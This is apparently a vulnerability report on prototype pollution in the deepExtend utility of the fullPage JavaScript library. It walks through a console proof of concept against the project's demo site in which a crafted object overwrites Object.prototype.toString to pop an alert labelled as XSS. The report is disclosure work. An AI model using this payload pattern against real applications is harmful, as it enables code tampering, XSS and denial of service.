fullPage
utils are available to developers using window.fp_utils
. They can use these utils for their own use-case (other than fullPage) as well. However, one of the utils deepExtend
is vulnerable to Prototype Pollution vulnerability.
Javascript is “prototype” language which means when a new “object” is created, it carries the predefined properties and methods of an “object” with itself like toString
, constructor
etc.
By using prototype-pollution vulnerability, an attacker can overwrite/create the property of that “object” type. If the victim developer has used that property anywhere in the code, then it will have severe effect on the application.
For e.g.:
var obj = {};
console.log(obj.A); // undefined
obj["__proto__"].A = 1;
console.log(obj.A); // 1
var new_obj = {};
console.log(new_obj.A); // 1 -> exploit
STEP 1: Visit https://alvarotrigo.com/fullPage demo.
STEP 2: Run the following code in dev tools console
NOTE: I am asking to run this in console
for PoC purpose only. The real-world exploitation scenario may vary.
var o = {};
o.toString();
var obj = window.fp_utils.deepExtend({},{"constructor": {"prototype": {"toString": () => {alert(`XSS via Prototype Pollution`)}}}});
STEP 3: Call toString
prototype function
o.toString();
and you will see an alert pop-up showing XSS exploitation.
Prototype pollution can be used to create/overwrite predefined properties and methods of object type. It can lead to XSS, change code logic, DoS etc. based on the application code.